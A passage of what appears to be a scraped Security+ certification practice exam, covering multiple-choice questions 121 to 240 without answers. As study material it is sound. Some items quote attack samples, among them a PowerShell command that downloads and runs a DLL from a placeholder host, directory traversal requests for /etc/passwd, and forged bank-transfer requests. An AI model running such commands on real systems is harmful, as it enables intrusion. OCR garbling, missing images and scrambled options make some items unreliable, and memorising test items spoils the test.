Disgruntled employee

Question 121

A malicious actor recently penetrated a company's network and moved laterally to the data center Upon investigation a forensics firm wants to know what was in the memory on the compromised server Which of the following files should be given to the forensics firm?

Options:

A.

Security

B.

Application

C.

Dump

D.

Syslog

Question 122

A security analyst is looking for a solution to help communicate to the leadership team the seventy levels of the organization's vulnerabilities. Which of the following would best meet this need?

Options:

A.

CVE

B.

SIEM

C.

SOAR

D.

CVSS

Question 123

Which Of the following vulnerabilities is exploited an attacker Overwrite a reg-ister with a malicious address that changes the execution path?

Options:

A.

VM escape

B.

SQL injection

C.

Buffer overflow

D.

Race condition

Question 124

An organization's corporate offices were destroyed due to a natural disaster, so the organization is now setting up offices in a temporary work space. Which of the following will the organization most likely consult?

Options:

A.

The business continuity plan

B.

The risk management plan

C.

The communication plan

D.

The incident response plan

Question 125

After multiple on-premises security solutions were migrated to the cloud, the incident response time increased The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

Options:

A.

CASB

B.

VPC

C.

SWG

D.

CMS

Question 126

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company's server:

Question # 126

Which of the following best describes this kind of attack?

Options:

A.

Directory traversal

B.

SQL injection

C.

API

D.

Request forgery

Question 127

A network administrator has been alerted that web pages are experiencing long load times After determining it is not a routing or DNS issue the administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago

1 sec ave: 99 percent busy

5 sec ave: 97 percent busy

1 min ave: 83 percent busy

Which of the following is The router experiencing?

Options:

A.

DDoS attack

B.

Memory leak

C.

Buffer overflow

D.

Resource exhaustion

Question 128

A security analyst receives an alert from the company's S1EM that anomalous activity is coming from a local source IP address of 192 168 34.26 The Chief Information Security Officer asks the analyst to block the originating source Several days later another employee opens an internal ticket stating that vulnerability scans are no longer being performed property. The IP address the employee provides is 192 168.34 26. Which of the following describes this type of alert?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Question 129

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following

is most likely preventing the IT manager at the hospital from upgrading the specialized OS?

Options:

A.

The time needed for the MRI vendor to upgrade the system would negatively impact patients.

B.

The MRI vendor does not support newer versions of the OS.

C.

Changing the OS breaches a support SLA with the MRI vendor.

D.

The IT team does not have the budget required to upgrade the MRI scanner.

Question 130

Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

Options:

A.

Lessons learned

B.

Identification

C.

Simulation

D.

Containment

Question 131

A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work. Which of the following should be included in this design to satisfy these requirements? (Select TWO).

Options:

A.

DLP

B.

MAC filtering

C.

NAT

D.

VPN

E.

Content filler

F.

WAF

Question 132

Which of the following allow access to remote computing resources, a operating system. and centrdized configuration and data

Options:

A.

Containers

B.

Edge computing

C.

Thin client

D.

Infrastructure as a service

Question 133

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs. Which of the following is the MOST likely cause of this issue?

Options:

A.

TFTP was disabled on the local hosts

B.

SSH was turned off instead of modifying the configuration file

C.

Remote login was disabled in the networkd.conf instead of using the sshd.conf.

D.

Network services are no longer running on the NAS.

Question 134

Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team. Which of the following would be MOST appropriate for the IT security team to analyze?

Options:

A.

Access control

B.

Syslog

C.

Session Initiation Protocol traffic logs

D.

Application logs

Question 135

While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method?

Options:

A.

Data loss prevention

B.

Blocking IP traffic at the firewall

C.

Containerization

D.

File integrity monitoring

Question 136

An organization wants to secure a LAN/WLAN so users can authenticate and transport data securely. The solution needs to prevent on-path attacks and evil twin attacks. Which of the following will best meet the organization's need?

Options:

A.

MFA

B.

802.1X

C.

WPA2

D.

TACACS

Question 137

Stakeholders at an organisation must be kept aware of any incidents and receive updates on status changes as they occur Which of the following Plans would fulfill this requirement?

Options:

A.

Communication plan

B.

Disaster recovery plan

C.

Business continuity plan

D.

Risk plan

Question 138

An organization recently completed a security control assessment The organization determined some controls did not meet the existing security measures. Additional mitigations are needed to lessen the risk of the non-complaint controls. Which of the following best describes these

mitigations?

Options:

A.

Corrective

B.

Compensating

C.

Deterrent

D.

Technical

Question 139

A security investigation revealed mat malicious software was installed on a server using a server administrator credentials. During the investigation the server administrator explained that Telnet was regularly used to log in. Which of the blowing most likely occurred?

Options:

A.

A spraying attack was used to determine which credentials to use

B.

A packet capture tool was used to steal the password

C.

A remote-access Trojan was used to install the malware

D.

A directory attack was used to log in as the server administrator

Question 140

Which of the following models offers third-party-hosted, on-demand computing resources that can be shared with multiple organizations over the internet?

Options:

A.

Public cloud

B.

Hybrid cloud

C.

Community cloud

D.

Private cloud

Question 141

A user is trying unsuccessfully to send images via SMS. The user downloaded the images from a corporate email account on a work phone. Which of the following policies is preventing the user from completing this action?

Options:

A.

Application management

B.

Content management

C.

Containerization

D.

Full disk encryption

Question 142

An employee's laptop was stolen last month. This morning, the was returned by the A cyberrsecurity analyst retrieved laptop and has since cybersecurity incident checklist Four incident handlers are responsible for executing the checklist. Which of the following best describes the process for evidence collection assurance?

Options:

A.

Time stamp

B.

Chain of custody

C.

Admissibility

D.

Legal hold

Question 143

A systems analyst is responsible for generating a new digital forensics chain -of- custody form Which of the following should the analyst include in this documentation? (Select two).

Options:

A.

The order of volatility

B.

A forensics NDA

C.

The provenance of the artifacts

D.

The vendor's name

E.

The date and time

F.

A warning banner

Question 144

A cybersecurity analyst at Company A is working to establish a secure communication channel with a counter part at Company B, which is 3,000 miles (4.828 kilometers) away. Which of the following concepts would help the analyst meet this goal m a secure manner?

Options:

A.

Digital signatures

B.

Key exchange

C.

Salting

D.

PPTP

Question 145

A company is moving its retail website to a public cloud provider. The company wants to tokenize audit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

Options:

A.

WAF

B.

CASB

C.

VPN

D.

TLS

Question 146

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following

technologies would be best to correlate the activities between the different endpoints?

Options:

A.

Firewall

B.

SIEM

C.

IPS

D.

Protocol analyzer

Question 147

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the companVs mobile

application. After reviewing the back-end server logs, the security analyst finds the following entries

Question # 147

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

user-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Question 148

A company was recently breached Pan of the company's new cybersecurity strategy is to centralize? the togs horn all security devices Which of the following components forwards the logs to a central source?

Options:

A.

Log enrichment

B.

Log queue

C.

Log parser

D.

Log collector

Question 149

A security administrator is using UDP port 514 to send a syslog through an unsecure network to the SIEM server. Which of the following is the best way for the administrator to improve the process?

Options:

A.

Change the protocol to TCP.

B.

Add LDAP authentication to the SIEM server.

C.

Use a VPN from the internal server to the SIEM and enable DLP.

D.

Add SSL/TLS encryption and use a TCP 6514 port to send logs.

Question 150

A security administrator Installed a new web server. The administrator did this to Increase the capacity (or an application due to resource exhaustion on another server. Which o( the following algorithms should the administrator use to split the number of the connections on each server In half?

Options:

A.

Weighted response

B.

Round-robin

C.

Least connection

D.

Weighted least connection

Question 151

Which of the following would be best to ensure data is saved to a location on a server, is easily scaled, and is centrally monitored?

Options:

A.

 Edge computing

B.

Microservices

C.

Containers

D.

Thin client

Question 152

Which of the following can reduce vulnerabilities by avoiding code reuse?

Options:

A.

Memory management

B.

Stored procedures

C.

Normalization

D.

Code obfuscation

Question 153

Unauthorized devices have been detected on the internal network. The devices’ locations were traced to Ether ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

Options:

A.

NAC

B.

DLP

C.

IDS

D.

MFA

Question 154

A data owner has been tasked with assigning proper data classifications and destruction methods for various types of data contained within the environment.

Question # 154

Options:

Question 155

Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?

Options:

A.

EF x asset value

B.

ALE / SLE

C.

MTBF x impact

D.

SLE x ARO

Question 156

Which of the following incident response phases should the proper collection of the detected 'ocs and establishment of a chain of custody be performed before?

Options:

A.

Containment

B.

Identification

C.

Preparation

D.

Recovery

Question 157

A company is focused on reducing risks from removable media threats. Due to certain primary applications, removable media cannot be entirely prohibited at this time. Which of the following best describes the company's approach?

Options:

A.

Compensating controls

B.

Directive control

C.

Mitigating controls

D.

Physical security controls

Question 158

A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows. Which of the following is MOST likely the cause of the malware infection?

Options:

A.

Open permissions

B.

Improper or weak patch management

C.

Unsecure root accounts

D.

Default settings

Question 159

A security analyst is assisting a team of developers with best practices for coding. The security analyst would like to defend against the use of SQL injection attacks. Which of the following should the security analyst recommend first?

Options:

A.

Tokenization

B.

Input validation

C.

Code signing

D.

Secure cookies

Question 160

An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox. Which of the following would be the best way for the security administrator to address this type of alert in the future?

Options:

A.

Utilize a SOAR playbook to remove the phishing message.

B.

Manually remove the phishing emails when alerts arrive.

C.

Delay all emails until the retroactive alerts are received.

D.

Ingest the alerts into a SIEM to correlate with delivered messages.

Question 161

Which of the following would satisfy three-factor authentication requirements?

Options:

A.

Password, PIN, and physical token

B.

PIN, fingerprint scan, and ins scan

C.

Password, fingerprint scan, and physical token

D.

PIN, physical token, and ID card

Question 162

A security analyst is reviewing computer logs because a host was compromised by malware After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

Options:

A.

Dump file

B.

System log

C.

Web application log

D.

Security too

Question 163

A manager for the development team is concerned about reports showing a common set of vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the team. Which of the following approaches would be most effective for the manager to use to

address this issue?

Options:

A.

Tune the accuracy of fuzz testing.

B.

Invest in secure coding training and application security guidelines.

C.

Increase the frequency of dynamic code scans 1o detect issues faster.

D.

Implement code signing to make code immutable.

Question 164

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Question 165

Several users have been violating corporate security policy by accessing inappropriate Sites on corporate-issued mobile devices while off campus. The senior leadership team wants all mobile devices to be hardened with controls that:

  • Limit the sites that can be accessed

  • Only allow access to internal resources while physically on campus.

  • Restrict employees from downloading images from company email

Whip of the following controls would best address this situation? (Select two).

Options:

A.

MFA

B.

GPS tagging

C.

Biometric authentication

D.

Content management

E.

Geofencing

F.

Screen lock and PIN requirements

Question 166

A company is moving to new location. The systems administrator has provided the following server room requirements to the facilities staff:

  • Consistent power levels in case of brownouts or voltage spikes
  • A minimum of 30 minutes runtime following a power outage
  • Ability to trigger graceful shutdowns of critical systems

Which of the following would BEST meet the requirements?

Options:

A.

Maintaining a standby, gas-powered generator

B.

Using large surge suppressors on computer equipment

C.

Configuring managed PDUs to monitor power levels

D.

Deploying an appropriately sized, network-connected UPS device

Question 167

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Question 168

A network administrator needs to determine Ihe sequence of a server farm's logs. Which of the following should the administrator consider? (Select TWO).

Options:

A.

Chain of custody

B.

Tags

C.

Reports

D.

Time stamps

E.

Hash values

F.

Time offset

Question 169

A security administrator examines the ARP table of an access switch and sees the following output:

Question # 169

Which of the following is a potential threat that is occurring on this access switch?

Options:

A.

DDoSonFa02 port

B.

MAG flooding on Fa0/2 port

C.

ARP poisoning on Fa0/1 port

D.

DNS poisoning on port Fa0/1

Question 170

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator most likely use to confirm the suspicions?

Options:

A.

Nmap

B.

Wireshark

C.

Autopsy

D.

DNSEnum

Question 171

A security engineer updated an application on company workstations. The application was running before the update, but it is no longer launching successfully. Which of the following most likely needs to be updated?

Options:

A.

Blocklist

B.

Deny list

C.

Quarantine list

D.

Approved fist

Question 172

A penetration tester was able to compromise a host using previously captured network traffic. Which of the following is the result of this action?

Options:

A.

Integer overflow

B.

Race condition

C.

Memory leak

D.

Replay attack

Question 173

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

Options:

A.

Continuous deployment

B.

Continuous integration

C.

Continuous validation

D.

Continuous monitoring

Question 174

A company is concerned about individuals driving a car into the building to gain access. Which of the following security controls would work BEST to prevent this from happening?

Options:

A.

Bollard

B.

Camera

C.

Alarms

D.

Signage

E.

Access control vestibule

Question 175

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation (or a few days. Which of the following attacks can the account lockout be attributed to?

Options:

A.

Backdoor

B.

Brute-force

C.

Rootkit

D.

Trojan

Question 176

A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data.

Which of the following additional controls should be put in place first?

Options:

A.

GPS tagging

B.

Remote wipe

C.

Screen lock timer

D.

SEAndroid

Question 177

An analyst is working on an investigation with multiple alerts for multiple hosts. The hosts are showing signs of being compromised by a fast-spreading worm. Which of the following should be the next step in order to stop the spread?

Options:

A.

Disconnect every host from the network.

B.

Run an AV scan on the entire

C.

Scan the hosts that show signs of

D.

Place all known-infected hosts on an isolated network

Question 178

A company would like to protect credit card information that is stored in a database from being exposed and reused. However, the current POS system does not support encryption. Which of the following would be BEST suited to secure this information?

(Give me related explanation and references from CompTIA Security+ SY0-601 documents for Correct answer option)

Options:

A.

Masking

B.

Tokenization

C.

DLP

D.

SSL/TLS

Question 179

A security manager is attempting to meet multiple security objectives in the next fiscal year. The security manager has proposed the purchase of the following four items:

Vendor A:

1- Firewall

1-12 switch

Vendor B:

1- Firewall

1-12 switch

Which of the following security objectives is the security manager attempting to meet? (Select two).

Options:

A.

Simplified patch management

B.

Scalability

C.

Zero-day attack tolerance

D.

Multipath

E.

Replication

F.

Redundancy

Question 180

A desktop computer was recently stolen from a desk located in the lobby of an office building. Which of the following would be the best way to secure a replacement computer and deter future theft?

Options:

A.

Installing proximity card readers on all entryway doors

B.

Deploying motion sensor cameras in the lobby

C.

Encrypting the hard drive on the new desktop

D.

Using cable locks on the hardware

Question 181

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?

Options:

A.

OWASP

B.

Obfuscation/camouflage

C.

Test environment

D.

Prevent of information exposure

Question 182

An organization recently released a zero-trust policy that will enforce who is able to remotely access certain data. Authenticated users who access the data must have a need to know, depending on their level of permissions.

Which of the following is the first step the organization should take when implementing the policy?

Options:

A.

Determine a quality CASB solution.

B.

Configure the DLP policies by user groups.

C.

Implement agentless NAC on boundary devices.

D.

Classify all data on the file servers.

Question 183

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Question 184

Which Of the following security controls can be used to prevent multiple from using a unique card swipe and being admitted to a entrance?

Options:

A.

Visitor logs

B.

Faraday cages

C.

Access control vestibules

D.

Motion detection sensors

Question 185

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

Options:

A.

MAC filtering

B.

Anti-malware

C.

Translation gateway

D.

VPN

Question 186

Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

Options:

A.

Web metadata

B.

Bandwidth monitors

C.

System files

D.

Correlation dashboards

Question 187

An engineer is using scripting to deploy a network in a cloud environment. Which the following describes this scenario?

Options:

A.

SDLC

B.

VLAN

C.

SDN

D.

SDV

Question 188

A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user MOST likely experiencing?

Options:

A.

Bluejacking

B.

Jamming

C.

Rogue access point

D.

Evil twin

Question 189

A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

Options:

A.

pcap reassembly

B.

SSD snapshot

C.

Image volatile memory

D.

Extract from checksums

Question 190

A security engineer is investigating a penetration test report that states the company website is vulnerable to a web application attack. While checking the web logs from the time of the test, the engineer notices several invalid web form submissions using an unusual address: "SELECT * FROM customername”. Which of the following is most likely being attempted?

Options:

A.

Directory traversal

B.

SQL injection

C.

Privilege escalation

D.

Cross-site scripting

Question 191

A security administrator is compiling information from all devices on the local network in order to gain better visibility into user activities. Which of the following is the best solution to meet

this objective?

Options:

A.

SIEM

B.

HIDS

C.

CASB

D.

EDR

Question 192

Which Of the following control types is patch management classified under?

Options:

A.

Deterrent

B.

Physical

C.

Corrective

D.

Detective

Question 193

Several users have opened tickets with the help desk. The help desk has reassigned the tickets to a security analyst for further review. The security analyst reviews the following metrics:

Question # 193

Which of the following is most likely the result of the security analyst's review?

Options:

A.

The ISP is dropping outbound connections.

B.

The user of the Sales-PC fell for a phishing attack.

C.

Corporate PCs have been turned into a botnet.

D.

An on-path attack is taking place between PCs and the router.

Question 194

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company's servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

Options:

A.

Revoke the code signing certificate used by both programs.

B.

Block all unapproved file hashes from installation.

C.

Add the accounting application file hash to the allowed list.

D.

Update the code signing certificate for the approved application.

Question 195

A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions alone. Which of the following solutions best fits this use case?

Options:

A.

EDR

B.

DLP

C.

NGFW

D.

HIPS

Question 196

Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

Options:

A.

Faraday cages

B.

Air gap

C.

Vaulting

D.

Proximity readers

Question 197

An internet company has created a new collaboration application. To expand the user base, the company wants to implement an option that allows users to log in to the application with the credentials of other popular websites. Which of the following should the company implement?

Options:

A.

SSO

B.

CHAP

C.

802.1X

D.

OpenlD

Question 198

A company is designing the layout of a new data center so it will have an optimal environmental temperature Which of the following must be included? (Select two).

Options:

A.

An air gap

B.

A cold aisle

C.

Removable doors

D.

A hot aisle

E.

An loT thermostat

F.

A humidity monitor

Question 199

After reviewing the following vulnerability scanning report:

server:192.168.14.6

Service: Telnet Port: 23 Protocol: TCP Status: Open Severity: High

Vulnerability: Use of an insecure network protocol

A security analyst performs the following test

nmap -p 23 192.1€8.14. € --script telnet-encryption

PORT STATE SERVICE REASON

23/tcp open telnet syn-ack

I telnet encryption:

| Telnet server supports encryption

Which of the following would the security analyst conclude for this reported vulnerability7?

Options:

A.

It is a false positive.

B.

A rescan is required.

C.

It is considered noise.

D.

Compensating controls exist

Question 200

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker most likely attempting?

Options:

A.

A spear-phishing attach

B.

A watering-hole attack

C.

Typo squatting

D.

A phishing attack

Question 201

A security analyst reviews web server logs and notices the following lines:

104.35.45.53 - - [22/May/2020:06:57:31 +0100] "GET /show_file.php file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 11705

"http://www.example.com/downloadreport.php "

104.35.45.53 -- [22/May/2020:07:00:58 +0100] "GET /show_file.php

file=%2e%2e%2f%2e%2e%2fetc%2fsudoers HTTP/1.1" 200 23713

"http://www.example.com/downloadreport.php "

Which of the following vulnerabilities has the attacker exploited? (Select TWO).

Options:

A.

Race condition

B.

LFI

C.

Pass the hash

D.

XSS

E.

RFI

F.

Directory traversal

Question 202

A security analyst has been reading about a newly discovered cyberattack from a known threat actor Which of the following would best support the analyst's review of the tactics, techniques, and protocols the throat actor was observed using in previous campaigns?

Options:

A.

Security research publications

B.

The MITRE ATT4CK framework

C.

The Diamond Model of Intrusion Analysis

D.

The Cyber Kill Cham

Question 203

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding credit card statement with unusual purchases. Which of the following attacks took place?

Options:

A.

On-path attack

B.

Protocol poisoning

C.

Domain hijacking

D.

Bluejacking

Question 204

A manufacturing organization wants to control and monitor access from the internal business network to the segregated production network, while ensuring minimal exposure of the production network to devices. Which of the following solutions would best accomplish this goal?

Options:

A.

Proxy server

B.

NGFW

C.

WAF

D.

Jump server

Question 205

Which of the following practices would be best to prevent an insider from introducing malicious code into a company’s development process?

Options:

A.

Code scanning for vulnerabilities

B.

Open-source component usage

C.

Quality assurance testing

D.

Peer review and approval

Question 206

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system Which of the following would detect this behavior?

Options:

A.

Implementing encryption

B.

Monitoring outbound traffic

C.

Using default settings

D.

Closing all open ports

Question 207

Which of the following is most likely to include a SCADA system?

  • Water treatment plant

  • Surveillance system

  • Smart watch

Options:

A.

Wi-Fi-enabled thermostat

Question 208

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account Which of the following does this action describe?

Options:

A.

Insider threat

B.

Social engineering

C.

Third-party risk

D.

Data breach

Question 209

Which of the following roles, according to the shared responsibility model, is responsible for securing the company's database in an laaS model for a cloud environment?

Options:

A.

Client

B.

Third-party vendor

C.

Cloud provider

D.

DBA

Question 210

Recent changes to a company's BYOD policy require all personal mobile devices to use a two-factor authentication method that is not something you know or have. Which of the following will meet this requirement?

Options:

A.

Facial recognition

B.

Six-digit PIN

C.

PKI certificate

D.

Smart card

Question 211

A company's web filter is configured to scan the URL for strings and deny access when matches are found. Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?

Options:

A.

encryption=off

B.

http://

C.

www.*.com

D.

:443

Question 212

Which of the following is the BEST action to foster a consistent and auditable incident response process?

Options:

A.

Incent new hires to constantly update the document with external knowledge.

B.

Publish the document in a central repository that is easily accessible to the organization.

C.

Restrict eligibility to comment on the process to subject matter experts of each IT silo.

D.

Rotate CIRT members to foster a shared responsibility model in the organization

Question 213

A sensitive piece of information in a production database is replaced with a non-sensitive value that, when compromised, provides no value to the offender. Which of the following describes this process?

Options:

A.

Tokenization

B.

Obfuscation

C.

Masking

D.

Hashing

Question 214

In which of the following scenarios is tokenization the best privacy technique to use?

Options:

A.

Providing pseudo-anonymization for social media user accounts

B.

Serving as a second factor for authentication requests

C.

Enabling established customers to safely store credit card information

D.

Masking personal information inside databases by segmenting data

Question 215

The IT department's on-site developer has been with the team for many years. Each lime an application is released; the security team is able to identify multiple vulnerabilities Which of the Mowing would best help the team ensure the application is ready to be released to production?

Options:

A.

Limit the use of third-party libraries.

B.

Prevent data exposure queries.

C.

Obfuscate the source code

D.

Submit the application to OA before releasing it.

Question 216

A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met:

• All actions performed by the network staff must be logged.

• Per-command permissions must be possible.

• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

Options:

A.

Kerberos

B.

CHAP

C.

TACACS+

D.

RADIUS

Question 217

Which of the following requirements apply to a CYOD policy? (Select two).

Options:

A.

The company should support only one model of phone.

B.

The user can request to customize the device.

C.

The company retains ownership of the phone.

D.

The end users can supply their own personal devices.

E.

Personal applications cannot be loaded on the phone.

F.

Employee-owned devices must run antivirus.

Question 218

A secondly administration is trying to determine whether a server is vulnerable to a range of attacks After using a tool, the administrator obtains the following output.

Question # 218

Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Question 219

A security administrator received an alert for a user account with the following log activity:

Question # 219

Which of the following best describes the trigger for the alert the administrator received?

Options:

A.

Number of failed log-in attempts

B.

Geolocation

C.

Impossible travel time

D.

Time-based log-in attempt

Question 220

A malicious actor compromised an entire cluster by exploiting a zero-day vulnerability in a unique container. The malicious actor then engaged in a lateral movement and compromised other containers and the host system. Which of the following container security practices has the GREATEST chance of preventing this attack from reoccurring?

Options:

A.

Deploying an IPS with updated signatures in line with the container cluster

B.

Implementing automatic scalability for containers exposed to the internet

C.

Updating the environment by using images with the tag: latest

D.

Executing containers using unprivileged credentials

Question 221

Following a prolonged data center outage that affected web-based sales, a company has decided to move its operations to a private cloud solution The security team has received the following requirements

• There must be visibility into how teams are using cloud-based services

• The company must be able to identity when data related to payment cards is being sent to the cloud

• Data must be available regardless of the end user's geographic location

• Administrators need a single pane-of-glass view into traffic and trends

Which of the following should the security analyst recommend?

Options:

A.

Create firewall rules to restrict traffic to other cloud service providers

B.

Install a DLP solution to monitor data in transit

C.

Implement a CASB solution

D.

Configure a web-based content filter

Question 222

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Question 223

A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer data. Which of the following would provide the best proof that the hosting provider has met the requirements?

Options:

A.

NIST CSF

B.

SOC 2 Type 2 report

C.

CIS Top 20 compliance reports

D.

Vulnerability report

Question 224

An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following techniques is the attacker using?

Options:

A.

Smishing

B.

Phishing

C.

Impersonating

D.

Vishing

Question 225

A systems administrator is auditing all company servers to ensure they meet the minimum security baseline While auditing a Linux server the systems administrator observes the /etc/ahadow file has permissions beyond the baseline recommendation. Which of the following commands should the systems administrator use to resolve this issue?

Options:

A.

chmod

B.

grep

C.

dd

D.

passwd

Question 226

Which of the following is an example of risk avoidance?

Options:

A.

Installing security updates directly in production to expedite vulnerability fixes

B.

Buying insurance to prepare for financial loss associated with exploits

C.

Not installing new software to prevent compatibility errors

D.

Not taking preventive measures to stop the theft of equipment

Question 227

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET http://yourbank.com/transfer.do?acctnum=08764 6959 &amount=500000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=087646958 &amount=5000000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=-087646958 &amount=1000000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=087646953 &amount=500 HTTP/1.1

Which of the following types of attacks is most likely being conducted?

Options:

A.

SQLi

B.

CSRF

C.

Spear phishing

D.

API

Question 228

A company wants to reconfigure an existing wireless infrastructure. The company needs to ensure the projected WAP placement will provide proper signal strength to all workstations. Which of the following should the company use to best fulfill the requirements?

Options:

A.

Network diagram

B.

WPS

C.

802.1X

D.

Heat map

Question 229

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Question 230

A dynamic application vulnerability scan identified that code injection could be performed using a web form. Which of the following will be the best remediation to prevent this vulnerability?

Options:

A.

Implement input validations

B.

Deploy UFA

C.

Utilize a WAF

D.

Conjure HIPS

Question 231

Which of the following is the correct order of volatility from most to least volatile?

Options:

A.

Memory, temporary filesystems. routing tables, disk, network storage

B.

Cache, memory, temporary filesystems. disk, archival media

C.

Memory, disk, temporary filesystems. cache, archival media

D.

Cache, disk, temporary filesystems. network storage, archival media

Question 232

A host was infected with malware. During the incident response. Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would most likely show where the malware originated?

Options:

A.

The DNS logs

B.

The web server logs

C.

The SIP traffic logs

D.

The SNMP logs

Question 233

A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider. Which of the following is a risk in the new system?

Options:

A.

Default credentials

B.

Non-segmented network

C.

Supply chain vendor

D.

Vulnerable software

Question 234

A company's marketing department collects, modifies, and stores sensitive customer data. The infrastructure team is responsible for Securing the data while in transit and at rest. Which of the following data roles describes the customer?

Options:

A.

Processor

B.

Custodian

C.

Subject

D.

Owner

Question 235

A security administrator is performing an audit on a stand-alone UNIX server, and the following message is immediately displayed:

(Error 13) : /etc/shadow: Permission denied.

Which of the following best describes the type of tool that is being used?

Options:

A.

Pass-the-hash monitor

B.

File integrity monitor

C.

Forensic analysis

D.

Password cracker

Question 236

Which of the following is the most common data loss path for an air-gapped network?

Options:

A.

Bastion host

B.

Unsecured Bluetooth

C.

Unpatched OS

D.

Removable devices

Question 237

A Chief Executive Officer's (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if the CEO's personal information is for sale?

Options:

A.

Automated information sharing

B.

Open-source intelligence

C.

The dark web

D.

Vulnerability databases

Question 238

Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?

Options:

A.

SSAE SOO 2

B.

PCI DSS

C.

GDPR

D.

ISO 31000

Question 239

A threat actor used a sophisticated attack to breach a well-known ride-sharing. company. The threat actor posted on social media that this action was in response to the company's treatment of its drivers Which of the following best describes tm type of throat actor?

Options:

A.

Nation-slate

B.

Hacktivist

C.

Organized crime

D.

Shadow IT

Question 240

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller

does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

